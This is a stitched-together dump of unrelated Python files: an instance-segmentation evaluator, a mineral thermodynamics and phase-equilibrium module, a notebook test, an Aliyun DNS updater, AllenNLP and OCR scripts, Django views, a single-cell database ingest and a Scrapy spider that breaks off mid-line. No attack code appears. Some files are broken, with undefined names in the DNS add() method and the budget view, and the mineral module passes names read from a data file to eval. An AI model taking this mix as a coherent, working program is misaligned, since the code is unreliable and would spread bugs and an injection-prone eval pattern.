VALID_CLASS_IDS[i] ap = avgs["classes"][class_name]["ap"] ap50 = avgs["classes"][class_name]["ap50%"] ap25 = avgs["classes"][class_name]["ap25%"] f.write(_SPLITTER.join([str(x) for x in [class_name, class_id, ap, ap50, ap25]]) + '\n') def evaluate(pred_files, gt_files, pred_path, output_file): print('evaluating', len(pred_files), 'scans...') matches = {} for i in range(len(pred_files)): matches_key = os.path.abspath(gt_files[i]) # assign gt to predictions gt2pred, pred2gt = assign_instances_for_scan(pred_files[i], gt_files[i], pred_path) matches[matches_key] 
= {} matches[matches_key]['gt'] = gt2pred matches[matches_key]['pred'] = pred2gt sys.stdout.write("\rscans processed: {}".format(i+1)) sys.stdout.flush() print('') ap_scores = evaluate_matches(matches) avgs = compute_averages(ap_scores) # print print_results(avgs) if output_file: write_result_file(avgs, output_file) def main(): pred_files = [f for f in os.listdir(opt.pred_path) if f.endswith('.txt') and f != 'semantic_instance_evaluation.txt'] gt_files = [] if len(pred_files) == 0: util.print_error('No result files found.', user_fault=True) for i in range(len(pred_files)): gt_file = os.path.join(opt.gt_path, pred_files[i]) if not os.path.isfile(gt_file): util.print_error('Result file {} does not match any gt file'.format(pred_files[i]), user_fault=True) gt_files.append(gt_file) pred_files[i] = os.path.join(opt.pred_path, pred_files[i]) # evaluate evaluate(pred_files, gt_files, opt.pred_path, opt.output_file) if __name__ == '__main__': main() import os import numpy as np import scipy import os import matplotlib as mpl import matplotlib.pyplot as plt import matplotlib.ticker as mtick import pandas as pd from scipy import integrate path='output' if os.path.isfile('path_file.dat'): path_file=open('path_file.dat', 'r') path=path_file.readline().rstrip() path_file.close() class latex_class(): """ Setup for the use of LaTeX for axis labels and titles; sets of parameters for graphics output. """ def __init__(self): self.flag=False self.dpi=300 self.font_size=14 self.tick_size=12 self.ext='jpg' mpl.rc('text', usetex=False) def on(self): self.flag=True mpl.rc('text', usetex=True) def off(self): self.flag=False mpl.rc('text', usetex=False) def set_param(self, dpi=300, fsize=14, tsize=12, ext='jpg'): """ Args: dpi: resolution of the graphics file (default 300) fsize: size of the labels of the axes in points (default 14) tsize: size of the ticks in points (default 12) ext: extension of the graphics file (default 'jpg'); this argument is only used in those routines where the name of the file is automatically produced by the program (e.g. check_poly or check_spline functions). In other cases, the extension is directly part of the name of the file given as argument to the function itself, and 'ext' is ignored. """ self.dpi=dpi self.font_size=fsize self.tick_size=tsize self.ext=ext def get_dpi(self): return self.dpi def get_fontsize(self): return self.font_size def get_ext(self): return self.ext def get_tsize(self): return self.tick_size class name_data: def __init__(self): self.mineral_names=[] def add(self,nlist): self.mineral_names.extend(nlist) class mineral: def __init__(self,name,nick): self.name=name self.nick=nick self.eos='m' self.cp=[[0, 0]] self.al=[[0, 0]] self.k0=0. self.kp=0. self.dkt=0. self.v0=0. self.g0=0. self.s0=0. 
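# --- Illustrative sketch (not part of the mineral class above): the cp and al attributes
# hold [coefficient, power] pairs, so a property at temperature T is the sum of
# coefficient * T**power over all pairs. The helper name below is hypothetical; the sample
# pairs are the enstatite Cp coefficients loaded further below in this file.
def eval_power_series(pairs, tt):
    """Evaluate sum(c * tt**p) over a list of [coefficient, power] pairs."""
    return sum(c * tt ** p for c, p in pairs)

# constant, linear, T^-2 and T^-0.5 terms evaluated at 500 K
print(eval_power_series([[356.2, 0], [-0.299e-2, 1], [-596900, -2], [-3185.3, -0.5]], 500.0))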
def info(self): print("Mineral: %s\n" % self.name) print("K0: %4.2f GPa, Kp: %4.2f, dK0/dT: %4.4f GPa/K, V0: %6.4f J/bar" \ % (self.k0, self.kp, self.dkt, self.v0)) print("G0: %8.2f J/mol, S0: %6.2f J/mol K\n" % (self.g0, self.s0)) print("EoS type: %s " % self.eos) print("Cp coefficients and powers:") for ci in self.cp: print('{:>+8.4e}{:>+6.1f}'.format(ci[0],ci[1])) print("\nAlpha coefficients and powers:") for ai in self.al: print('{:>+8.4e}{:>+6.1f}'.format(ai[0],ai[1])) def load_ref(self,v0,g0,s0): self.v0=v0 self.g0=g0 self.s0=s0 def load_bulk(self,k0, kp, dkt): self.k0=k0 self.kp=kp self.dkt=dkt def load_eos_type(self,eos): if eos==0: self.eos='m' else: self.eos='bm' def load_cp(self,cpc,cpp): cl=list(zip(cpc,cpp)) item=0 self.cp=np.array([]) for ic in cl: self.cp=np.append(self.cp,[cl[item][0], cl[item][1]]) item=item+1 self.cp=self.cp.reshape(item,2) def load_alpha(self, alc, alp): cl=list(zip(alc,alp)) item=0 self.al=np.array([]) for ic in cl: self.al=np.append(self.al,[cl[item][0], cl[item][1]]) item=item+1 self.al=self.al.reshape(item,2) def cp_t(self,tt): cpt=0. iterm=0 for it in self.cp: cpt=cpt+self.cp[iterm,0]*(tt**self.cp[iterm,1]) iterm=iterm+1 return cpt def alpha_t(self,tt): alt=0. iterm=0 for it in self.al: alt=alt+self.al[iterm,0]*(tt**self.al[iterm,1]) iterm=iterm+1 return alt def kt(self,tt): return self.k0+(tt-298.15)*self.dkt def entropy(self,tt): fc=lambda ti: (self.cp_t(ti))/ti integ, err=scipy.integrate.quad(fc,298.15,tt) return integ+self.s0 def volume_t(self,tt): fc= lambda ti: self.alpha_t(ti) integ,err=scipy.integrate.quad(fc,298.15,tt) # return (self.v0)*(1.+integ) return (self.v0)*np.exp(integ) def volume_p(self,tt,pp): k0t=self.kt(tt) vt=self.volume_t(tt) if self.eos=='m': fact=(1.-(pp*self.kp)/(pp*self.kp+k0t))**(1./self.kp) return fact*vt elif self.eos=='bm': pf=lambda f: (3*k0t*f*(1+2*f)**(5/2)*(1+3*f*(self.kp-4)/3)-pp)**2 ff=scipy.optimize.minimize(pf,1,tol=0.00001) return vt/((2*ff.x[0]+1)**(3/2)) def volume_fix_t_p(self,tt): return lambda pp: self.volume_p(tt,pp) def vdp(self,tt,pp): fv=self.volume_fix_t_p(tt) integ,err=scipy.integrate.quad(fv,0.000001, pp) return integ*1e4 def g_t(self,tt): integ,err=scipy.integrate.quad(self.entropy, 298.15, tt) return integ def g_tp(self,tt,pp): return self.g0+self.vdp(tt,pp)-self.g_t(tt) def alpha_p(self, tt, pp): v=self.volume_p(tt,pp) t_list=np.linspace(tt-10, tt+10, 5) vt_list=np.array([]) for ti in t_list: vi=self.volume_p(ti,pp) vt_list=np.append(vt_list,vi) fitpv=np.polyfit(t_list,vt_list,2) fitder1=np.polyder(fitpv,1) altp=np.polyval(fitder1,tt) return 1*altp/v def s_tp(self,tt,pp): gtp=lambda tf: self.g_tp(tf,pp) t_list=np.linspace(tt-5, tt+5, 5) g_list=np.array([]) for ti in t_list: gi=self.g_tp(ti,pp) g_list=np.append(g_list,gi) fit=np.polyfit(t_list,g_list,2) fitder=np.polyder(fit,1) return -1*np.polyval(fitder,tt) def h_tp(self,tt,pp): g=self.g_tp(tt,pp) s=self.s_tp(tt,pp) return g+tt*s latex=latex_class() name_list=name_data() ens=mineral("enstatite","en") cor=mineral("corindone","cor") py=mineral("pyrope","py") coe=mineral("coesite", "coe") q=mineral("quartz","q") fo=mineral("forsterite", "fo") ky=mineral("kyanite","ky") sill=mineral("sillimanite","sill") andal=mineral("andalusite","and") per=mineral("periclase","per") sp=mineral("spinel","sp") mao=mineral("maohokite","mao") fmao=mineral("fe-maohokite","fmao") stv=mineral("stishovite","stv") cc=mineral("calcite", "cc") arag=mineral("aragonite", "arag") jeff=mineral("jeffbenite", "jeff") jeff_fe=mineral("Fe-jeffbenite", "jeff_fe") 
jeff_fe3p=mineral("Fe3p-jeffbenite", "jeff_fe3p") jeff_feb=mineral("Feb-jeffbenite", "jeff_feb") def export(mineral_nick): al_power_dic={ 'b1': 0, 'b2': 1, 'b3': -1, 'b4': -2, 'b5': -0.5 } cp_power_dic={ 'c1': 0, 'c2': 1, 'c3': -2, 'c4': 2, 'c5': -0.5, 'c6': -1, 'c7': -3, 'c8': 3 } f=open('data_perplex.dat', 'a+') nick=mineral_nick+'.' alpha=eval(nick+'al') cp=eval(nick+'cp') g0=eval(nick+'g0') v0=eval(nick+'v0') s0=eval(nick+'s0') name=eval(nick+'nick') string_h=name+' '+'EoS = 2\n' string_ini='G0 = '+str(g0)+' S0 = '+str(round(s0,4))+' V0 = '+str(round(v0,4))+'\n' string_cp='' for cpi in cp: pi=cpi[1] for ki,vi in cp_power_dic.items(): if vi==pi: string_cp=string_cp+ki+' = '+str(round(cpi[0],6))+' ' string_al='' for ali in alpha: pi=ali[1] for ki,vi in al_power_dic.items(): if vi==pi: string_al=string_al+ki+' = '+str("%.6g" % ali[0])+' ' string_cp=string_cp+'\n' string_al=string_al+'b6 = '+str(round(eval(nick+'k0')*1e4,6))+' ' string_al=string_al+'b7 = '+str(round(eval(nick+'dkt')*1e4,6))+' ' if eval(nick+'eos')=='m': eos='b8 = '+str(round(eval(nick+'kp'),4)) elif eval(nick+'eos')=='bm': eos='b8 = '+str(round(-1*eval(nick+'kp'),4)) string_al=string_al+eos+'\n\n' f.write(string_h) f.write(string_ini) f.write(string_cp) f.write(string_al) f.close() print("Exported data set in data_perplex.dat, with the following content:\n") print(string_h+string_ini+string_cp+string_al) def load_database(): ens.load_ref(6.262,-2915760, 132.5) ens.load_bulk(107,4,-0.01605) ens.load_cp([356.2, -.299E-2, -596900, -3185.3],[0, 1, -2, -1./2]) ens.load_alpha([.505E-4, -.505E-3],[0, -1./2]) ens.eos='m' cor.load_ref(2.558, -1581710, 50.9) cor.load_bulk(252,4,-0.0347) cor.load_cp([139.5, .589E-2, -2460600,-589.2 ],\ [0, 1, -2, -1./2]) cor.load_alpha([.419E-4,-.419E-3],[0, -1./2]) cor.eos='m' py.load_ref(11.318,-5934105,266.30) py.load_bulk(173.7,4.00,-0.026055) py.load_cp([633.5, -5196100, -4315.2],\ [0, -2, -0.5]) py.load_alpha([0.436E-4, -0.436E-3],\ [0, -0.5]) py.eos='bm' load_database() # ----------- Reactions ------------------ def equilib(tini,tfin,npoint,pini=1,prod=['py',1], rea=['ens',1.5,'cor', 1],\ out=False, tex=False, title=True, save=''): """ Computes the equilibrium pressure for a reaction involving a given set of minerals, in a range of temperatures. Args: tini: minimum temperature in the range tfin: maximum temperature in the range npoint: number of points in the T range pini (optional): initial guess for the pressure prod: list of products of the reaction in the form [name_1, c_name_1, name_2, c_name_2, ...] where name_i is the name of the i^th mineral, as stored in the database, and c_name_i is the corresponding stoichiometric coefficient rea: list of reactants; same syntax as the "prod" list. Example: equilib(300, 500, 12, prod=['py',1], rea=['ens', 1.5, 'cor', 1]) """ if os.path.isfile("path_file.dat"): path_file=open("path_file.dat", "r") path=path_file.read() path=path.rstrip() lprod=len(prod) lrea=len(rea) prod_spec=prod[0:lprod:2] prod_coef=prod[1:lprod:2] rea_spec=rea[0:lrea:2] rea_coef=rea[1:lrea:2] lastr=rea_spec[-1] lastp=prod_spec[-1] prod_string='' for pri in prod_spec: prod_string=prod_string + pri if pri != lastp: prod_string=prod_string+' + ' rea_string='' for ri in rea_spec: rea_string = rea_string + ri if ri != lastr: rea_string=rea_string+' + ' t_list=np.linspace(tini,tfin,npoint) p_list=np.array([]) h_list=np.array([]) s_list=np.array([]) v_list=np.array([]) cs_list=np.array([]) for ti in t_list: pi=pressure_react(ti,pini, prod_spec, prod_coef, rea_spec, rea_coef) hprod=0. 
sprod=0. vprod=0. for pri, pci in zip(prod_spec, prod_coef): hprod=hprod+(eval(pri+'.h_tp(ti,pi)'))*pci sprod=sprod+(eval(pri+'.s_tp(ti,pi)'))*pci vprod=vprod+(eval(pri+'.volume_p(ti,pi)'))*pci hrea=0. srea=0. vrea=0. for ri,rci in zip(rea_spec, rea_coef): hrea=hrea+(eval(ri+'.h_tp(ti,pi)'))*rci srea=srea+(eval(ri+'.s_tp(ti,pi)'))*rci vrea=vrea+(eval(ri+'.volume_p(ti,pi)'))*rci hi=hprod-hrea si=sprod-srea vi=vprod-vrea dsdv_i=si/vi p_list=np.append(p_list,pi) h_list=np.append(h_list,hi) s_list=np.append(s_list,si) v_list=np.append(v_list,vi) cs_list=np.append(cs_list, dsdv_i) serie=(t_list.round(1),p_list.round(2),h_list.round(3), s_list.round(3), \ v_list.round(4), cs_list.round(2)) pd.set_option('colheader_justify', 'center') df=pd.DataFrame(serie, index=['T (K)','P (GPa)','DH(J/mol)', \ 'DS (J/mol K)', 'DV (J/bar)','Slope (bar/K)']) df=df.T df2=df.round(3) print("") print(df2.to_string(index=False)) ymax=max(p_list)+0.1*(max(p_list)-min(p_list)) ymin=min(p_list)-0.1*(max(p_list)-min(p_list)) xloc_py, yloc_py, xloc_en, yloc_en=field(tini,tfin, ymin, ymax, \ prod_spec, prod_coef, rea_spec, rea_coef) dpi=80 if tex: latex.on() dpi=latex.get_dpi() fontsize=latex.get_fontsize() ticksize=latex.get_tsize() print("\n") fig=plt.figure() ax=fig.add_subplot(111) if title: if latex.flag: ax.title.set_text("Reaction "+ rea_string + ' $\leftrightarrow$ ' + prod_string + "\n" ) else: ax.title.set_text("Reaction "+ rea_string + " <--> " + prod_string + "\n" ) ax.text(xloc_en, yloc_en, rea_string) ax.text(xloc_py,yloc_py, prod_string) ax.plot(t_list,p_list,"k-") ax.axis([tini,tfin,ymin,ymax]) ax.yaxis.set_major_locator(plt.MaxNLocator(5)) ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.2f')) ax.xaxis.set_major_locator(plt.MaxNLocator(8)) ax.xaxis.set_major_formatter(mtick.FormatStrFormatter('%.1f')) if latex.flag: ax.set_xlabel("Temperature (K)", fontsize=fontsize) ax.set_ylabel("Pressure (GPa)", fontsize=fontsize) plt.xticks(fontsize=ticksize) plt.yticks(fontsize=ticksize) else: ax.set_xlabel("Temperature (K)") ax.set_ylabel("Pressure (GPa)") if save != '': plt.savefig(fname=path+'/'+ save,dpi=dpi, bbox_inches='tight') plt.show() latex.off() clap=np.polyfit(t_list,p_list,1) cl_s=clap[0]*1.e4 print("\nAverage Clapeyron Slope (from Delta S/Delta V): %6.2f bar/K" \ % cs_list.mean()) print("Clapeyron slope (from a linear fit of the P/T curve): %6.2f bar/K"\ % cl_s) if out: return t_list, p_list def reaction(tt,pp, prod_spec, prod_coef, rea_spec, rea_coef): """ Computes the Gibbs free energy of reaction at given temperature (tt) and pressure (pp), involving specified minerals. """ gprod=0. for pri, pci in zip(prod_spec, prod_coef): gprod=gprod+(eval(pri+'.g_tp(tt,pp)'))*pci grea=0. for ri,rci in zip(rea_spec, rea_coef): grea=grea+(eval(ri+'.g_tp(tt,pp)'))*rci return gprod-grea def pressure_react(tt,pini, prod_spec, prod_coef, rea_spec, rea_coef): """ Computes the pressure at which a given set of minerals is at the equilibrium for a specified temperature. "pini" is a initial guess for the pressure. Output in GPa. "pressure_react" calls "reactions, and it is invoked by "equilib". 
""" fpr=lambda pp: (reaction(tt,pp, prod_spec, prod_coef, rea_spec, rea_coef))**2 pres=scipy.optimize.minimize(fpr,pini,tol=1) return pres.x def field(tmin,tmax,pmin,pmax,\ prod_spec, prod_coef, rea_spec, rea_coef, nx=6, ny=6): t_range=np.linspace(tmin,tmax,nx) p_range=np.linspace(pmin,pmax,ny) fld=np.array([]) for ti in t_range: for pi in p_range: de=reaction(ti,pi,prod_spec, prod_coef, rea_spec, rea_coef) fld=np.append(fld,[ti,pi,de]) fld=fld.reshape(nx*ny,3) prodx=np.array([]) prody=np.array([]) reax=np.array([]) reay=np.array([]) for fi in fld: if fi[2]>0: reax=np.append(reax,fi[0]) reay=np.append(reay,fi[1]) else: prodx=np.append(prodx,fi[0]) prody=np.append(prody,fi[1]) return prodx.mean(), prody.mean(), reax.mean(), reay.mean() def import_database(): name_l=[] al_power_dic={ 'b1': 0, 'b2': 1, 'b3': -1, 'b4': -2, 'b5': -0.5, } cp_power_dic={ 'c1': 0, 'c2': 1, 'c3': -2, 'c4': 2, 'c5': -0.5, 'c6': -1, 'c7': -3, 'c8': 3 } list_cpc=[] list_cp=[] for ki,vi in cp_power_dic.items(): list_cpc.append(ki) list_cp.append(vi) list_cal=[] list_al=[] for ki,vi in al_power_dic.items(): list_cal.append(ki) list_al.append(vi) line='' with open('perplex_db.dat') as f: jc=0 l0=[''] while True: line=f.readline().rstrip() if line=='': continue if line == 'END': break jc=jc+1 line_s=line.split() if line_s != []: l0=line_s[0].rstrip() if l0=='#': continue name=l0 name_l.append(l0) l1=f.readline() l2=f.readline().rstrip() l2_s=l2.split() g0=float(l2_s[2]) s0=float(l2_s[5]) v0=float(l2_s[8]) l3=f.readline().rstrip() l3_s=l3.split() l3n=len(l3_s) coeff_cp=l3_s[2:l3n:3] coeff_cp=[float(ci) for ci in coeff_cp] power_ccp=l3_s[0:l3n:3] power=[] for cci in power_ccp: power.append(cp_power_dic.get(cci)) l4=f.readline().rstrip() l4_s=l4.split() l4n=len(l4_s) l4n_alpha=l4n-9 coeff_alpha=l4_s[2:l4n_alpha:3] coeff_alpha=[float(ai) for ai in coeff_alpha] power_ac=l4_s[0:l4n_alpha:3] power_a=[] for ai in power_ac: power_a.append(al_power_dic.get(ai)) k0=float(l4_s[-7])/1.e4 dkt=float(l4_s[-4])/1.e4 kp=float(l4_s[-1]) eos_flag=0 eos='m' if kp < 0.: eos='bm' kp=-1*kp eos_flag=1 eval(name+'.load_ref(v0,g0,s0)') eval(name+'.load_bulk(k0,kp,dkt)') eval(name+'.load_cp(coeff_cp,power)') eval(name+'.load_alpha(coeff_alpha,power_a)') eval(name+'.load_eos_type(eos_flag)') f.readline() line=f.readline().rstrip() f.close() name_list.add(name_l)hengwei-chan/fragmentation_and_assemble import pytest import pathlib import nbformat from nbconvert.preprocessors import ExecutePreprocessor ROOT_DIR = pathlib.Path(__file__).parent.resolve() NOTEBOOK_DIR = ROOT_DIR.parent / "docs" / "tutorials" NOTEBOOK_PATHS = NOTEBOOK_DIR.glob("*.ipynb") NOTEBOOK_PATHS = sorted(list(NOTEBOOK_DIR.glob("*.ipynb"))) @pytest.mark.skip_platform("win") @pytest.mark.parametrize("nb_path", NOTEBOOK_PATHS, ids=[str(n.name) for n in NOTEBOOK_PATHS]) def test_notebook(nb_path): # Setup and configure the processor to execute the notebook ep = ExecutePreprocessor(timeout=600, kernel_name="python3") # Open the notebook with open(nb_path) as f: nb = nbformat.read(f, as_version=nbformat.NO_CONVERT) # Execute the notebook ep.preprocess(nb, {"metadata": {"path": NOTEBOOK_DIR}}) fruits=[] fruits.append("apple") fruits.append("banana") fruits.append("orange") fruits.append("grape") print(fruits) fruits.insert(2,"cherry") print(fruits) del fruits[3] print(fruits)#!/usr/bin/env python # coding=utf-8 import json import logging from aliyunsdkalidns.request.v20150109.AddDomainRecordRequest import AddDomainRecordRequest from 
aliyunsdkalidns.request.v20150109.UpdateDomainRecordRequest import UpdateDomainRecordRequest from aliyunsdkalidns.request.v20150109.DescribeSubDomainRecordsRequest import DescribeSubDomainRecordsRequest import Debug import ResponseUtil def get_domain_record_id(response): """ :param response: :return: """ response = json.loads(response) if response: domain_records = response["DomainRecords"] if domain_records: record = domain_records["Record"] if record and len(record) > 0: return record[0]["RecordId"] return None def response_record_id(response): """ :param response: :return: """ response = json.loads(response) if response: return response["RecordId"] return None class DomainUtil(object): def __init__(self, client=None): self.client = client @ResponseUtil.debug(Debug.debugEnable, None) def record_id(self, sub_domain): """ :param sub_domain: :return: """ request = DescribeSubDomainRecordsRequest() request.set_accept_format('json') request.set_SubDomain(sub_domain) try: logging.info("Start to find domain record id for sub domain %s." % sub_domain) response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record = get_domain_record_id(str(response, encoding='utf-8')) if not record: raise ValueError("Record ID NullPointException") logging.info("Found domain record id %s for sub_domain : %s." % (record, sub_domain)) return True, record else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to get description for domain %s" % sub_domain, e) return False, e @ResponseUtil.debug(Debug.debugEnable, None) def add(self, domain_type, rr, domain_name, value): """ :param domain_type: A :param rr: hk :param domain_name: *************** :param value: *************** :return: """ request = AddDomainRecordRequest() request.set_accept_format('json') request.set_Value(value) request.set_Type(domain_type) request.set_RR(rr) request.set_DomainName(domain_name) try: response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record_id = response_record_id(response) if record_id: logging.info("Successfully add domain information for : %s.%s to %s" % (rr, domain, value)) return True, None else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to add sub domain parse information for %s.%s to %s" % (rr, domain, value), e) return False, e @ResponseUtil.debug(Debug.debugEnable, None) def update(self, record_id, domain_type, rr, value): """ :param record_id: *************** :param domain_type: A :param rr: hk :param value: *************** :return: """ request = UpdateDomainRecordRequest() request.set_accept_format('json') request.set_Value(value) request.set_Type(domain_type) request.set_RR(rr) request.set_RecordId(record_id) try: response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record_id = response_record_id(response) if record_id: logging.info("Successfully update domain parse information for %s to %s" % (record_id, value)) return True, None else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to add sub domain parse information for %s to %s" % (record_id, value), e) return False, e def change(self, domain_type, rr, domain_name, eip): is_ok, record_id = self.record_id("%s.%s" % (rr, domain_name)) if is_ok: return self.update(record_id, domain_type, rr, eip) else: return self.add(domain_type, rr, domain_name, eip) py/cidoc_crm_types/properties/p179i_was_sales_price_of.py from 
dataclasses import dataclass @dataclass class P179iWasSalesPriceOf: URI = "http://erlangen-crm.org/current/P179i_was_sales_price_of" from typing import Dict, Optional import torch from overrides import overrides from allennlp.data import Vocabulary, TextFieldTensors from allennlp.models.model import Model from allennlp.modules import TextFieldEmbedder, Seq2SeqEncoder from allennlp.nn import InitializerApplicator from allennlp_models.generation.models import ComposedSeq2Seq from allennlp_models.generation.modules.seq_decoders.seq_decoder import SeqDecoder @Model.register("composed_seq2seq_kw") class ComposedSeq2SeqKW(ComposedSeq2Seq): """ Does everything that the standard composed_seq2seq model does but doesn't care if you pass additional arguments to forward() """ def __init__( self, vocab: Vocabulary, source_text_embedder: TextFieldEmbedder, encoder: Seq2SeqEncoder, decoder: SeqDecoder, tied_source_embedder_key: Optional[str] = None, initializer: InitializerApplicator = InitializerApplicator(), **kwargs, ) -> None: super(ComposedSeq2SeqKW, self).__init__(vocab, source_text_embedder, encoder, decoder, tied_source_embedder_key, initializer, **kwargs) @overrides def forward( self, # type: ignore source_tokens: TextFieldTensors, target_tokens: TextFieldTensors = None, **kwargs ) -> Dict[str, torch.Tensor]: return super().forward(source_tokens, target_tokens) 1-10 import os import json import torch import logging import pathlib import traceback import argparse from modules.utils.util import make_dir from modules.utils.util import predict from modules.models.model import OCRModel logging.basicConfig(level=logging.DEBUG, format='') def load_model(model_path, with_gpu): config = json.load(open('config.json')) logger.info("Loading checkpoint: {} ...".format(model_path)) checkpoints = torch.load(model_path, map_location='cpu') if not checkpoints: raise RuntimeError('No checkpoint found.') print('Epochs: {}'.format(checkpoints['epoch'])) state_dict = checkpoints['state_dict'] model = OCRModel(config) if with_gpu and torch.cuda.device_count() > 1: model.parallelize() model.load_state_dict(state_dict) if with_gpu: model.to(torch.device('cuda')) model.eval() return model def main(args: argparse.Namespace): model_path = args.model input_dir = args.input_dir output_dir = args.output_dir with_image = True if output_dir else False with_gpu = True if torch.cuda.is_available() else False # with_gpu = False if with_image: make_dir(os.path.join(output_dir, 'img')) model = load_model(model_path, with_gpu) types = ('*.jpg', '*.png', '*.JPG', '*.PNG') # the tuple of file types files_grabbed = [] for files in types: files_grabbed.extend(input_dir.glob(files)) for image_fn in files_grabbed: try: with torch.no_grad(): ploy, im = predict(image_fn, model, with_image, output_dir, with_gpu) print(image_fn, len(ploy)) except Exception as e: traceback.print_exc() print(image_fn) if __name__ == '__main__': logger = logging.getLogger() parser = argparse.ArgumentParser(description='Model eval') parser.add_argument('-m', '--model', default=None, type=pathlib.Path, required=True, help='path to model') parser.add_argument('-o', '--output_dir', default=None, type=pathlib.Path, help='output dir for drawn images') parser.add_argument('-i', '--input_dir', default=None, type=pathlib.Path, required=True, help='dir for input image') args = parser.parse_args() main(args) src/field_demarcation_revenue/views.py from django.shortcuts import render from django_tables2 import RequestConfig from .models import FieldDemarcationRevenue from 
.tables import FieldDemarcationRevenueTable # Create your views here. def fieldDemarcationRevenue(request): fieldDemarcationRevenue_Table = FieldDemarcationRevenueTable(FieldDemarcationRevenue.objects.all()) fieldDemarcationRevenue_Table.order_by="vdc" RequestConfig(request, paginate={"per_page":30}).configure(fieldDemarcationRevenue_Table) context = { "fieldDemarcationRevenue_Table": fieldDemarcationRevenue_Table } return render(request,"field_demarcation_revenue.html",context) def budget_nep(request): budget_table = BudgetTable(Budget.objects.all()) budget_table.order_by="budget_number" RequestConfig(request, paginate={"per_page":25}).configure(budget_table) context = { "budget_table": budget_table } return render(request,"budget_nep.html",context)""" Works with a directory of anndata objects which are the result of anndataize_ebi.py To run change the DATADIR and FULLPATHDB global run and run the script from the repos venv. python ebi_anndata_in.py """ import os import scanpy as sc from sqlalchemy import create_engine, Table, MetaData # Full path to the sqllite db FULLDBPATH = "/home/duncan/work/singlecelldb-ingest" # Path to the data directory filled with ebi anndata objects. DATADIR = "./data" # Connection to the database. dbstartstr = "sqlite:///%s" % FULLDBPATH engine = create_engine(dbstartstr, echo=True) metadata = MetaData() conn = engine.connect() # Accessor for each of the tables. dataset = Table('dataset', metadata, autoload=True, autoload_with=engine) cluster_solution_table = Table('cluster_solution', metadata, autoload=True, autoload_with=engine) cluster = Table('cluster', metadata, autoload=True, autoload_with=engine) cell_of_cluster = Table('cell_of_cluster', metadata, autoload=True, autoload_with=engine) def cluster_description(k): return "sc3 clusters k=%d from ebi's single cell atlas" % k def sc3_method_url(): return "http://bioconductor.org/packages/release/bioc/html/SC3.html" for filename in os.listdir(DATADIR): print(filename) ad = sc.read(os.path.join(DATADIR,filename)) name = filename.split("_ebi")[0] cell_count = ad.shape[0] data_source_url = ad.uns["view_data_url"] cluster_solution_names = ad.uns["sc3_cluster_solutions"] try: preferred_cluster_solution = ad.uns["sc3_preferred_cluster"] except KeyError: preferred_cluster_solution = None species = ad.uns["species"] description = ad.uns["short_description"] cluster_solutions = ad.obs[cluster_solution_names] dataset_ins = dataset.insert().values( name=name, species=species, cell_count=cell_count, description=description, data_source_url=data_source_url ) result = conn.execute(dataset_ins) dataset_key = result.inserted_primary_key for cluster_solution_name in cluster_solution_names: cluster_solution = cluster_solutions[cluster_solution_name].dropna() cluster_values = cluster_solution.unique().tolist() print("**************************************") print(cluster_values) k = len(cluster_values) cluster_sol_ins = cluster_solution_table.insert().values( name=cluster_solution_name, description=cluster_description(k), method="sc3", method_url=sc3_method_url(), dataset_id=dataset_key[0] ) result = conn.execute(cluster_sol_ins) cluster_sol_key = result.inserted_primary_key for cluster_value in cluster_values: cluster_ins = cluster.insert().values( name=str(cluster_value), cluster_solution_id=cluster_sol_key[0] ) result = conn.execute(cluster_ins) cluster_key = result.inserted_primary_key cell_ids = cluster_solution[cluster_solution == cluster_value].index cells = [dict(name=n, cluster_id=cluster_key[0]) for n in cell_ids] 
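# --- Illustrative sketch (not part of the ingest script above): the `cells` list built just
# above is a list of dicts, which SQLAlchemy Core can insert in one executemany-style call,
# conn.execute(table.insert(), list_of_dicts). The in-memory table below is only for
# demonstration and is not the project's schema.
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String

_demo_engine = create_engine("sqlite://")  # throwaway in-memory database
_demo_meta = MetaData()
_demo_cells = Table(
    "demo_cell_of_cluster", _demo_meta,
    Column("id", Integer, primary_key=True),
    Column("name", String),
    Column("cluster_id", Integer),
)
_demo_meta.create_all(_demo_engine)

_rows = [{"name": "cell_1", "cluster_id": 1}, {"name": "cell_2", "cluster_id": 1}]
with _demo_engine.begin() as demo_conn:  # begin() commits the transaction on exit
    demo_conn.execute(_demo_cells.insert(), _rows)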
print(cells) conn.execute(cell_of_cluster.insert(), cells) vietzerg/Scrape-Finance-Data-v2 # Used for getting the list of companies in the same industry import json import logging import os import sys import traceback from datetime import date import redis import scrapy from scrapy import FormRequest from scrapy.crawler import CrawlerProcess from scrapy.exceptions import DontCloseSpider from scrapy.utils.log import configure_logging from scrapy_redis import defaults from scrapy_redis.spiders import RedisSpider from scrapy_redis.utils import bytes_to_str import scraper_vietstock.spiders.models.utilities as utilities from scraper_vietstock.helpers.fileDownloader import save_jsonfile from scraper_vietstock.spiders.scraperVSRedis import scraperVSRedisSpider from scraper_vietstock.spiders.models.counterparts import count_data from scraper_vietstock.spiders.models.counterparts import find_data as ctp from scraper_vietstock.spiders.models.counterparts import name, settings class counterPartsHandler(scraperVSRedisSpider): name = name custom_settings = settings def __init__(self, *args, **kwargs): super(counterPartsHandler, self).__init__(*args, **kwargs) self.date = str(date.today().strftime("%Y-%m-%d")) self.idling = False def next_requests(self): """ Replaces the default method. Closes spider when tickers are crawled and queue empty. """ use_set = self.settings.getbool( 'REDIS_START_URLS_AS_SET', defaults.START_URLS_AS_SET) fetch_one = self.server.spop if use_set else self.server.lpop found = 0 while found < self.redis_batch_size: data = fetch_one(self.redis_key) if not data: break params = bytes_to_str(data, self.redis_encoding).split(";") ticker = params[0] self.idling = False try: pageSize = params[1] req = self.make_request_from_data(ticker, pageSize) if req: yield req else: self.logger.info("Request not made from data: %r", data) except: count_data["formdata"]["code"] = ticker count_data["formdata"]["tradingdate"] = self.date count_data["meta"]["ticker"] = ticker count_data["meta"]["counted"] = "0" req = FormRequest(url=count_data["url"], formdata=count_data["formdata"], headers=count_data["headers"], cookies=count_data["cookies"], meta=count_data["meta"], callback=self.parse, errback=self.handle_error ) if req: yield req self.logger.info( f'Counting number of associates of {ticker}') else: self.logger.info("Request not made from data: %r", data) found += 1 if found: self.logger.debug("Read %s params from '%s'", found, self.redis_key) # Close spider if corpAZ is closed and none in queue and spider is idling # Print off requests with errors, then delete all keys related to this Spider if self.r.get(self.corpAZ_closed_key) == "1" and 